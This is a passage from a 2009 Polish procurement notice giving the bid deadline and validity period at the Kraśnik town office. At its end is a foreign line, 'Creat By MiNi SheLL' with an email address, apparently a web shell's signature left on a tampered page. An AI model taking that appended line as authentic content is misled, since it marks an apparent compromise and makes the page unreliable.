pok. 218.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 10:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 12.11.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com